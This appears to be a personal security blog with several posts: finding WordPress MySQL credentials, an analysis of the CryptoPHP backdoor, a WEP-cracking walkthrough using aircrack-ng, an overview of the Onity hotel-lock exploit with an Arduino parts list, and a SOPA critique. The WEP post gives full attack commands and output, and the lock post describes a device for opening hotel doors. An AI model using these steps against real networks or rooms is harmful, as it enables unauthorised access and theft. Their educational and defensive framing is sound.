Find Your MySQL Username/Password in WordPress

If you need to manually manage your MySQL database associated with a WordPress installation, you’ll need to get the proper credentials first. Database connection information usually consists of:

  • Username (DB_USER)
  • Password (DB_PASSWORD)
  • Database name (DB_NAME)
  • Database host (DB_HOST)
  • Database port (WordPress assumes MySQL’s default port of 3306)

This information can be found in your wp-config.php. To show all lines of wp-config.php that have “DB_” in them, run the following command from the terminal:

grep -r 'DB_' wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'username');
define('DB_PASSWORD', '********');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

This information can now be used to log in to MySQL’s command-line interface:

mysql -u username -p

Leaving the “-p” parameter empty will trigger MySQL to prompt you for a password. On a *NIX server, it will look like you’re not typing anything — this is by design. While you may specify the password in the same line, this can leave your plaintext password in your command history, which is easily readable. If you want to use this format anyway (i.e., in a script), note that you cannot put a space between the “-p” flag and your password:

mysql -u username -ppassword

Once you’ve logged in, you can view available databases with the show databases; command. To use your wordpress database, take the value from DB_NAME (above) and use the use command: use wordpress;. To see available tables in the selected database, run show tables;.

Find Your MySQL Username/Password in WordPress

CryptoPHP – A WordPress backdoor in social.png

Summary

This is a series of posts on CryptoPHP, a PHP backdoor used for spamming and blackhat SEO. It seems to come bundled with certain copies of WordPress themes from unofficial sites and resides in a file named “social.png”. It comes installed with a list of email addresses and domains to contact and communicates with a C2 server using cURL and OpenSSL for encryption. Its main purpose appears to be to facilitate the display of links and other content, sent from the C2 server. When the script determines that a web crawler (e.g., GoogleBot), and not a real user, is viewing the site, it injects links to third-party sites in hopes of being indexed.

Symptoms

CryptoPHP communicates with external servers, requiring multiple external requests. You may see the following symptoms:

  • WordPress is slow to load, especially during the first pageview
  • Error messages in your server log, possibly due to failed requests.
  • Error messages from IDS/IPS or other security software (e.g., Suhosin) indicating that someone is making calls to exec and eval.

Discovery

A few days ago, I noticed that a WordPress installation was running extremely slowly. After enabling xhprof and profiling the index page, I noticed that a single method (RoQfzgyhgTpMgdUIktgNdYvKE) was taking around 160 seconds to run. The method name (others in the stack were similarly named) and the 23 calls to curl_exec came off as immediately suspicious. I used grep to search for the file and found it under the themes folder as images/social.png.

This file was included at the bottom of a theme file, causing it to be executed on each page load.

<?php include_once(‘images/social.png’); ?>

Opening social.png in a text editor reveals obfuscated and minified code. While it looks like a mess, it’s simply renamed variables and functions with whitespace removed, and can be undone rather easily with the “Find/Replace All” feature of your favorite text editor.

Obfuscated CryptoPHP

 

How to Remove CryptoPHP or social.png

In the limited tests that I’ve done, the offending file – social.png – is the only file that is malicious. It seems to be added to the images/ directory in themes downloaded from unofficial sources. Another line in the main theme files (index.php, header.php or footer.php) includes the file.

While nothing in the file itself indicates that personal or sensitive data is being transmitted back to the server, the file allows its controllers to send commands to it. These commands are then executed by the eval and exec commands in PHP. It is theoretically possible for content, account information, etc. to be transmitted back to the controlling server.

Since the WordPress instance I was using was running on localhost, it would have been unreachable by the controlling servers. It could still phone home and download commands, but could not be controlled directly.  However, due to the possibility of sensitive data being stolen, and the evidence of storing information in the database, I’d recommend a complete re-install of WordPress and changing your admin password(s).

Coming Soon

  • Encryption methods (including a script to decrypt database contents)
  • Detailed/technical review
CryptoPHP – A WordPress backdoor in social.png

Cracking WEP Encryption With aircrack-ng

This article will walk you through cracking WEP encryption with the aircrack-ng suite. Due to the weaknesses in WEP, this can be done in roughly 5 minutes. For this attack, you’ll need the aircrack-ng suite, available here. You’ll also need a compatible wireless chipset (see their documentation for details). I’ll be running this on Linux with an Atheros chipset.

The first step is to open up a Terminal, and enter iwconfig, this should give you a list of your wireless adapters. I’ll be using wlan0 in the examples, but yours may be different.

wlan0     IEEE 802.11bgn  ESSID:"FLVY3"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: 00:26:62:65:B7:78   
          Bit Rate=54 Mb/s   Tx-Power=17 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:8DE0-85A9-34
          Power Management:on
          Link Quality=55/70  Signal level=-55 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:13   Missed beacon:0

Configure the Wireless Adapter

Now put the device down and change our MAC address (optional, uses the macchanger program) by issuing the following commands:

ifconfig wlan0 down
macchanger --mac AA:BB:CC:DD:EE:FF wlan0

If you get the “ERROR: Can’t change MAC: interface up or not permission: Device or resource busy” error, try repeating the ifconfig wlan0 downagain, and then try macchanger --mac AA:BB:CC:DD:EE:FF wlan0 again. At any point, you can check your MAC address by issuing the commandmacchanger --show wlan0

Now we’ll put the wireless adapter into monitoring mode by issuing the command airmon-ng start wlan0. It may show processes that it thinks may interfere with the airmon-ng program. You can kill these processes or just give it a shot without killing them.

Next, we’ll start the airodump-ng program by issuing the command airodump-ng wlan0 and scan for available access points. You should see something like this:

CH  1  ][ Elapsed: 8 s ][ 2011-12-27  17:02

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:11:22:33:44:55 -62 82 10 0 1 54e. WEP WEP WiFi2

BSSID STATION PWR Rate Lost Packets Probes [More stuff here]

The BSSID shows the MAC address for the access point and the ESSID should show the network name. CH indicates what 802.11 channel the AP is broadcasting on, and the ENC value is the encryption used (WEP, WPA, WPA2). The CIPHER and AUTH columns show what cipher and form of authentication are in place. The MB indicates what 802.11 version (speed) is in place. 802.11b has a value of “11”, 802.11b+ is represented by “22” and 802.11g is anything higher than 22. This AP also has an “e.” after it, which indicates that QoS is enabled (e) and that the short preamble is supported (.). Finally, the #Data column shows the number of packets captured – in the case of WEP, this is the number of unique IVs. The #/s column shows the average packets per second (calculated over a running 10-second interval).

We want to identify an AP that is using WEP encryption, not WPA or WPA2. Once we’ve figured out the BSSID and the channel, we’ll kill the program with Ctrl+C and restart it, filtering the results to that specific AP. We’re also going to capture the data to a file using the -w switch. Below, we use the-c to specifiy the channel and –bssid to specifiy the BSSID of the AP. Also, the filenamehere can be anything you want.

airodump-ng -c 1 -w filenamehere --bssid 00:11:22:33:44:55 wlan0

You should now see the same screen as before, but with only the selected interface. The #Data column may or may not be incrementing, depending on whether or not you’re already connected to the network and other factors. We want the #Data column to be around 10,000, and it would take forever to wait..so let’s speed that up.

Faking Authentication & Capturing IV Packets

Open another terminal window. We’re going to fake an authentication to the AP, so that our packets register (and we can record the transactions). Issue the command:

aireplay-ng -1 0 -a (BSSID) -h (Your MAC) -e (ESSID) wlan0.

In this example, I would enter:

aireplay-ng -1 0 -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF -e WiFi2 wlan0

Note: If you don’t know your MAC address, omit the -h and the MAC address. It should use the default address.

If successful, you’ll see an output like this:

17:08:35  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:08:35 Sending Authentication Request (Open System) [ACK] 17:08:35 Authentication successful 17:08:35 Sending Association Request [ACK] 17:08:35 Association successful :-) (AID: 1)

We used the -1 switch to tell aireplay-ng to perform an authentication attack with a delay of 0. Sometimes this doesn’t work for a number of reasons, usually MAC address filtering is enabled (in which case you need to figure out the MAC of an approved computer, and spoof it), or you’re too close or too far away.

Now that we’ve authenticated, we’ll spam the router with ARP packets to boost the #Data value in the first terminal window. Issue the following command:
aireplay-ng -3 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0
If successful, you’ll see output like:

17:09:20  Waiting for beacon frame (BSSID: 00:26:62:65:B7:78) on channel 1
Saving ARP requests in replay_arp-1227-171920.cap
You should also start airodump-ng to capture replies.
Read 1440 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

There should be a slight delay, followed by a bunch of text. Your computer may show this as one line that continually changes or as a line after line:

...
Read 38023 packets (got 19897 ARP requests and 10309 ACKs), sent 11410 packets..
Read 38174 packets (got 19993 ARP requests and 10358 ACKs), sent 11461 packets..
Read 38313 packets (got 20083 ARP requests and 10404 ACKs), sent 11510 packets..
Read 38455 packets (got 20171 ARP requests and 10451 ACKs), sent 11560 packets..
Read 38609 packets (got 20269 ARP requests and 10501 ACKs), sent 11610 packets..
Read 38748 packets (got 20357 ARP requests and 10546 ACKs), sent 11660 packets..
Read 38889 packets (got 20447 ARP requests and 10592 ACKs), sent 11711 packets..
Read 39033 packets (got 20535 ARP requests and 10640 ACKs), sent 11761 packets..
Read 39174 packets (got 20624 ARP requests and 10686 ACKs), sent 11810 packets..
Read 39326 packets (got 20719 ARP requests and 10735 ACKs), sent 11860 packets..
Read 39481 packets (got 20810 ARP requests and 10782 ACKs), sent 11911 packets..
Read 39635 packets (got 20909 ARP requests and 10832 ACKs), sent 11961 packets..
Read 39776 packets (got 20999 ARP requests and 10879 ACKs), sent 12011 packets..
Read 39919 packets (got 21090 ARP requests and 10926 ACKs), sent 12061 packets..
Read 40071 packets (got 21184 ARP requests and 10975 ACKs), sent 12111 packets..
Read 40212 packets (got 21271 ARP requests and 11020 ACKs), sent 12161 packets..
Read 40355 packets (got 21363 ARP requests and 11067 ACKs), sent 12211 packets..
...

Cracking the Key — Finally!

Once we’ve acquired enough #Data (these are the captured IVs), we can attempt to crack the key by using aircrack-ng. Open a third terminal, and issue the following command:

aircrack-ng -b 00:11:22:33:44:55 filenamehere-01.cap

Be sure to append “-01.cap” to the filenamehere value you picked (above). The -b value should be the BSSID of the access point.

The aircrack-ng program will read the captured IVs from the filenamehere-01.cap file, and you may see it scan through several screens (below) while it is testing the keys against the known IVs:

Opening test-01.cap
Reading packets, please wait...

                        Aircrack-ng 1.1 r1904


             [00:00:01] Tested 362881 keys (got 13078 IVs)

KB depth byte(vote) 0 1/ 5 56(17408) 84(16896) DF(16896) F5(16896) 2D(16640) 1 0/ 2 B8(18688) A6(17664) AC(17408) 96(17152) F7(17152) 2 1/ 2 5A(18176) AC(17664) 32(16896) C8(16896) CF(16896) 3 0/ 1 67(19712) 03(18176) 81(17920) 53(17408) 9B(17408) 4 2/ 3 61(18176) 3B(17408) 4A(17408) 70(17408) 5F(17152) 5 7/ 8 B4(16640) 17(16384) B8(16384) CE(16384) EA(16384) 6 2/ 3 A5(17920) BE(17408) AD(17152) 36(16896) 2C(16640) 7 0/ 1 01(19968) F7(17408) 17(17152) 43(17152) C8(17152) 8 2/ 3 80(17664) 68(17152) 0F(16896) 5D(16896) E7(16896) 9 2/ 3 D3(17664) 72(16896) 1E(16640) AF(16640) D2(16640) 10 6/ 7 1C(16896) 39(16640) 6D(16640) 08(16384) 3D(16384) 11 1/ 2 42(18176) 12(17920) 3F(17664) 95(17152) FE(16896) 12 3/ 4 18(17408) F9(16896) D5(16640) E5(16640) 11(16384)

If you were successful, you should finally see a screen that looks like this:

            Aircrack-ng 1.1 r1904



             [00:00:15] Tested 535861 keys (got 13078 IVs)

KB depth byte(vote) 0 52/ 54 CA(14592) 2F(14336) 34(14336) 78(14336) 83(14336) 1 10/ 1 BB(16128) 1F(15872) 7C(15872) 8C(15872) 19(15616) 2 12/ 26 67(16384) 15(16128) 6F(16128) AA(16128) 5E(15872) 3 4/ 12 9B(17408) CF(16896) D5(16896) 16(16384) 1A(16384) 4 16/ 4 FF(16128) 77(15872) D5(15872) DD(15872) 27(15616)

                     KEY FOUND! [ XX:YY:ZZ:AA:BB ] 
Decrypted correctly: 100%

That’s it! In a matter of 15 seconds, this program was able to completely decrypt the wireless password for the access point. Moral of the story: If you don’t want people getting in to your network, use WPA (or better yet, WPA2) encryption.

Cleaning Up

Before you connect to the internet again, you’ll need to issue airmon-ng stop wlan0 to release your adapter. Also, if you’re connecting via the command line, you can enter the key (without the colons) normally, or (if it’s a passphrase), remember to use the s: before entering the passphrase. Bear in mind, though, that aircrack-ng will give you the key in HEX. If you use the WEP passphrase mode for your key, it may not match up with what you’re familiar with, but give it a shot in HEX mode.

Cracking WEP Encryption With aircrack-ng

Onity Hotel Lock Exploit

Update: 12/28/2012 – I’m a bit late on this, but this has actually been exploited for criminal activity. Imagine that. Apparently, it’s not as “unreliable, complex and difficult to implement” as Onity thought.

Update: 8/19/2012 – Anxiously awaiting delivery of ATtiny85 chips to convert this into an even more compact device (also would be cheaper and able to be mass-produced).

Cody Brocious did a presentation at Black Hat 2012 on how to exploit the Onity hotel locks, and is the main source of information for this page. His original page for the talk is located here. Please take the time to visit Cody’s site if you’re interested in how this works. I’m only going to present a brief overview, so as not to detract from his paper.

Unfortunately, I don’t have my own personal hotel locks to play with, and hotels thus far have either not had a GM available when I stopped in or the GM has dismissed this as nonsense. One even said “If I feel there’s a problem with our locks, I’ll contact our Onity rep. We pay them good money, so I’m sure this is all taken care of.” An engineer at Holiday Inn was very interested in resolving it, but I’m not aware of anyone making progress in getting the PP codes. (If you have a PP, there are plenty of us interested in engineering a software solution, rather than forcing a hardware update.)

A quick survey shows about 60-75% of the hotel locks in  Pittsburgh (city, not region) are vulnerable to this at the time of this writing.

The Lock

Lock

If you’ve stayed in a hotel, you’ve probably seen this lock. Cody asserts this lock is one of the more popular brands and gives a figure of over 4 million installed. What you probably haven’t seen is the programming port, located on the bottom of the lock (red arrow). It uses a size “K” DC adapter (5.0mm OD x 2.1mm ID, center positive) to communicate with the programming device (Portable Programmer, PP). I’ll refer you to Cody’s site for specifics on the communication protocol. Essentially, the PP and lock work as master-slave, with the PP as the master. The PP transmits a 3.3v signal (HIGH) when idle, and the signal drops into a LOW state in order to communicate.

When the locks are installed, a sitecode is written to the lock’s memory. This is a 32-bit value that’s unique to the facility, but shared among all equipment in that hotel. After that, there are several other values, including the code for the Master keys and the Programming key (more on this later).

Using the PP, staff are able to open the lock manually. The PP issues an “OPEN” command in combination with the sitecode. Since the sitecode is hidden from even the property owner, this is supposed to provide a bit of security against anyone just opening the lock, right?

(Of course not, you wouldn’t be reading this if that were the case!)

All we have to do is read the sitecode from the lock’s memory, and mix it in with the OPEN command (which is the same for every lock). This takes around 220 milliseconds to perform.

Open Command

The lock simply opens, and the access log reads as though the PP was used by staff to open the door. This is done by programming the Arduino to continuously send “open” commands via the DC plug. In practice, it takes around 1-2 seconds to open the lock, due to timing problems and at what point in the code you insert the plug into the lock. For all intents and purposes, it’s instantaneous.

The Arduino

If you haven’t heard of the Arduino yet, it’s similar to the BASIC Stamp microprocessor, but faster, cheaper and open-source. It uses it’s own open-source programming language, which is heavily based on C. An Arduino Uno runs around $35 at RadioShack and the Arduino Mega is around $65. Additional parts you’ll need (if starting from scratch) are:

  • An A to B USB adapter (the big square one that’s probably plugged into your printer)
  • Two “K” size DC barrel plugs (5.0mm OD x 2.1mm ID). Center is positive for both.
  • A few pieces of wire and a 5.6k resistor (green-blue-red for those people)
  • A 9v battery plug. Wire this to one of the DC plugs. This will be the power source for your Arduino. (You can run it off of USB power, but it won’t be as stealthy if you have a computer attached to it)
  • The Arduino software (Free – arduino.cc)
  • The source code – not provided here. (It’s not hard to find, but I’m not giving handouts)
Arduino

I also used some heat-shrink tubing and a lighter (hence the black smoke marks on the clear tubing), as well as two small pieces of 22ga solid wire. Everything is twisted together (not soldered) and held together with heat-shrink tubing.

I modified the code to blink the LED on pin 13 five times (50ms on/off) at the beginning of each loop, because I like feedback. I’m also working on code that will intercept the transmissions between the lock and a PP and send it back to my computer, on the off chance one of the managers calls me back and says “Yeah, sure, take a look”.

It’s not pretty, but it gets the job done (power supply not shown). Add a cool project enclosure, and you have yourself a portable master key to any room in any hotel that uses Onity locks.

Protect Yourself

Onity has acknowledged the problem (+1 point to Onity), but claims “the hacking methods [are] unreliable, and complex to implement.” If by “complex”, they mean “anyone with a few pieces of wire and a BIC lighter can throw this together in the middle of Starbucks in 10 minutes”, then yes, it’s very complex. Cody claims varying success with this device, but I don’t know that I’d call it “unreliable”. (In my limited tests, it has worked 100% of the time.)

Onity is currently manufacturing plugs (see above link) to block the programming pin and also providing a TORX screw to replace the battery cover. That will stop anyone without a TORX bit (Less than a dollar, if I recall correctly) from using this method. They totally won’t spend that extra dollar at RadioShack.

They’re also talking about a “firmware” update, by which they apparently mean “replace the circuit board in all 4 million locks and issue new programming devices to each hotel”. It’ll probably only be a matter of time until this new “firmware” is broken, too.

Case-in-point: Don’t let them fool you, this is inexpensive, shockingly easy to implement, and more reliable than it should be.

I don’t want to sound like I’m suggesting a boycott of anyone using Onity locks, but if you’re concerned about your safety, you may want to choose a hotel with a different lock (given the option). A brief look at Pittsburgh hotels (city, not suburban) shows that around half of them have Onity locks.

It goes without saying that you should be using the chain lock /bar latch on the door (but this can be kicked in easily or opened with a rubber band). Hopefully, you’d wake up if this was going on, but I’ve slept through much more.

While the old adage “locks are meant to keep honest people out” still holds true, this particular lock requires almost zero skill to open. If you can install iTunes, transfer music to your iPod, then plug it into your car sound system, you can do this.

Onity Hotel Lock Exploit

Stop Online Piracy Act (SOPA) and You

Note: This was written quite a while ago. While the risks are still factual, the politics are well outdated.

This article touches briefly on the security risks associated with the Stop Online Piracy Act (SOPA). If you’re looking for information on possible countermeasures, you may be interested in some of these links:

What is SOPA?

H.R. 3261, also known as the Stop Online Piracy Act (SOPA) is a piece of legislation that is attempting to allow federal censorship of the internet (along with S.968, commonly referred to asthe PROTECT IP act. Both of these pieces of legislation not only threaten our freedom online, but could also have a major effect on internet censorship globally. Politics aside, the act poses several very real security threats to not only the infrastructure of the internet itself, but to the millions of people who use it every day. A whitepaper, published here (direct PDF),presents an in-depth analysis of the technical problems that would be caused by the implementation of DNS-level censorship. I’m not going to discuss the infrastructure risks or politics here, but rather focus on the number of security risks that very likely will present themselves to the average internet user.

Proposed Implementation: DNS Filtering

There are several ways to censor content on the web. With the current Digital Millennium Copyright Act, or DMCA, individual service providers are responsible for removing infringing content. In other words, if I were to post copyrighted content, my hosting provider would be responsible for removing my site, not the government. An ISP can be served with a DMCA takedown notice by anyone who feels their copyright has been infringed, and sites may be taken down with only a “good faith effort” on behalf of the complaintant – it doesn’t even have to be a legitimate takedown notice, it just needs to be filed with good intentions. For the special interests groups (MPAA, RIAA, et al.), this still isn’t enough.

In countries like China, Iran, and Egypt, the national governments handle the censorship. The method that’s been proposed for the US (and is used in some countries) is DNS filtering. Your employer, school, or other organization may employ DNS filtering on a local level, which isn’t so bad for the health of the internet. (It’s also easy to bypass, see this page.)

However, implementing DNS filtering on a nationwide level poses a number of security threats to the internet itself, which in turn create security threats to you, the end user. DNS (Domain Name System) is the system by which your computer translates a web address (http://www.cmattoon.com) to an IP address (69.175.118.186). Computers only understand IP addresses, but they’re inconvenient for humans to remember, so we have a “phonebook” (so to speak), that translates an easy-to-remember domain name to an IP address, so that your computer can connect to the correct server. When you type an address into your web browser, the DNS looks up the IP address, and gives it back to your computer. Then, your computer can connect to the site you requested.

DNS Filtering works by giving your computer bad directions. If you wanted to view www.example.com, which contained information that your government felt was unsuitable for you, the DNS would give your computer the IP address of the government’s “Nothing to see here” page. By tampering with the directory system of the internet and re-directing content, you open up the system to exploitation. We’ve worked so hard to improve security and trust online, and tampering with the DNS undermines both of those.

Fact: The Filters WILL Be Bypassed

“Locks are there to keep honest people out” – this saying touches upon the reality that no lock (or filter) will keep determined people from attaining their goal. Teenagers bypass parental controls to look at porn. Employees bypass corporate web filters to get to their favorite sites. The Chinese have been bypassing the “Great Firewall of China” since its inception. No matter what the government tries to throw at people, they’ll eventually find a way to circumvent it. Several tools have already been created for the sole purpose of bypassing anticipated SOPA filters.

Besides using browser add-ons or third-party applications, users can modify their HOSTS file, or change their default DNS servers (say, to a foreign DNS that’s not subject to US law). You can even enter the IP address directly into the URL field, and bypass the DNS altogether (since your computer doesn’t need to look up directions). Aside from manually entering an IP address or installing an approved Firefox add-on, these steps can pose a serious risk to your computer if performed improperly.

Any new technology or change in habit among internet users as a whole opens up new possibilities to malicious hackers, identity thieves, etc. Let’s take a look at the can of worms that SOPA could open.

Problem #1: Malicious Software & Websites

Once the general public is fully aware of the SOPA provisions, perhaps when YouTube is taken down due to SOPA violations, they will begin to look for alternatives. Opportunists will likely develop a million different versions of software that will allow you to view or download the blocked content. While some of these programs may be legitimate, we all know how many virus-ridden, spyware-infested applications are available for download over the internet. Since most people these days have antivirus software installed, this shouldn’t be too much of an issue, right?

Wrong.

Even legitimate software could be used to modify your HOSTS file (perhaps automatically, for ease-of-use), to help you get to your favorite censored website. Currently, Windows protects the HOSTS file against changes, unless accessed with Administrator privleges. Of course, that doesn’t necessarily stop the malicious hackers from gaining access, either directly or through an application. And while your antivirus may catch an attempt to modify the HOSTS file, it will be widely-publicized that modification of the HOSTS file, albeit risky, is not so bad afterall. Therefore, more users will probably just click “ignore”, or simply disable their antivirus when it won’t let them ignore the file. (If you think this isn’t the case, there are hundreds of studies that show people will open just about anything, ignoring all warnings, to get to what they want.)

The second problem with software solutions is that they come with the possibility of intercepting ALL of your internet traffic. For example, a new program that routes traffic around the DNS filters has to know what site you’re requesting, as well as have the means to shuttle information back and forth. A malicious programmer could easily write a program to capture all your login data, and send it off to his computer. Again, this already happens on a daily basis (google: phishing, or see Credential Harvesting with SET).

Software aside, thousands of blogs and websites will appear (and have already started to), telling users how to bypass the DNS filter. The problem is, not all of these websites will be truthful. Be wary of any site telling you to “download this widget” or “allow Administrator access” to a program. Always double-check the information you find online with reputable sources. Don’t simply follow the first tutorial that Google shows you.

Problem #2: Rogue DNS Servers

Additionally, there is the option to modify your DNS settings, so that your computer could query a DNS server in another country that doesn’t have to comply with SOPA. Let me re-state that for clarity:
You can route all of your internet traffic through someone’s server, located in the basement of some guy’s house, on the other side of the world, outside the jurisdiction of US law.

While it’s true that a lot of DNS servers will probably pop up, and a lot of them will be operated by well-intentioned free-speech advocates, companies trying to make a few bucks, or whomever, there WILL be a large number that are operated by malicious people, who would be able to intercept every bit of data you transmit over the internet. (Of course, there’s always the possibility that the “good” DNS servers will be hacked, and your information exploited anyway).

Given that your average internet user knows almost nothing about how the internet works internally, and most of them will click on anything, this is begging for
disaster. Picture every 13 year old who wants to download the latest Hannah Montana song following a tutorial on how to tamper with DNS server settings. This isn’t speculation, it can and WILL happen. If you don’t believe me, ask the IT department at your local middle school how many hours were spent un-fucking their network and applying security patches and upgrades because of some kid bypassing filters or modifying network settings. (I know, I was that kid.)

Or check out forum posts like this, this, this, and this.

Problem #3: Social Engineering

As more and more people start to bypass the DNS filtering put in place by Uncle Sam, they’ll be familiar with lots of warnings, antivirus temper tantrums, and words of wisdom. And just like they do now, they’ll ignore them. Why? Because it’ll be so commonplace. If you’re an Internet Explorer user, think of the last time the Information Bar appeared, and you just clicked the “Yeah, whatever. Show me what I’m looking for” option? How many times have you let a Java or JavaScript app run, without having the foggiest idea as to what it does? We do it all the time. We know the pop-up blocker is there for our own good, but we add exceptions without thinking, because we figure it’s being overly-sensitive. We allow programs to modify files and settings on our computer when we install new programs, and we don’t even know what they’re modifiying. What makes anyone think this won’t be a BIGGER problem when the content-sharing sites that so many of us love are blocked?

As people become accustomed to ignoring more and more errors and warnings, more opportunities will present for the malicious hackers. Again, the human element (stupidity and complacency) are huge factors in compromising networks and computers. Tons of survey sites, giveaway programs, adware, and sketchy porn sites are notoriously infested with stuff that’s bad for your computer. Fortunately, most of us don’t have a reason to visit shady web sites, and are wise to their scams, so that part of the internet isn’t a huge threat to educated internet users.

But what about a website that explains how their new program can let you watch YouTube videos again? It’s free (honest) just download our new toolbar and make sure it’s running anytime you’re online – particularly when you’re checking your bank accounts, e-mail, or entering credit card information. Bet the farm that, if
SOPA or PROTECT IP pass, the internet will see tons of these sites popping up. Everything from spyware-infested toolbars to “secure” proxy sites to DIY tutorials written in barely-legible English.

I’ve also mentioned previously that it’s possible to use DNS servers outside of the US. If this becomes a popular method to bypass the filtering, users will eventually become comfortable (or at least accustomed to) routing their internet traffic overseas. They’ll get used to the slower connection time (because of the longer distance) and other hassles that come with it. But alas, even the more cautious people will eventually slip up and check their bank account in a hurry, forgetting that everything is potentially exposed, and their information will be in the hands of the malicious server operator. It only takes one slip-up, and your information could be stolen.

Summary

No matter which way you look at it, SOPA and PIPA are horrible ideas.

From a political stance, they promote the expansion of government (who’s going to monitor all this? Certainly, we’ll need a new department!) and infringement of first-amendment rights. It eliminates internet freedom in favor of a special-interests group (RIAA/MPAA), and will not stop piracy anyway. Hell, even RIAA and DHS employees have been caught downloading illegal music at work. It’s a gateway to more thorough internet censorship (give them an inch, they’ll take a mile), and similar laws have already been abused. It tampers with the inner workings of the internet, compromises state-of-the-art authentication techniques (DNSSEC), and exposes users to numerous security threats, viruses and cyberattacks.

Internet piracy, along with malware in all forms, is here to stay. People love free stuff, and will go out of their way to NOT pay for their music. After all, who has $30,000 to fill up their iPod? (I know, that’s a poor excuse). In addition, this sets a dangerous precident globally. Other countries may start to ask: If the United States, the epitome of liberty & freedom, can censor the internet, why can’t we?

Stop Online Piracy Act (SOPA) and You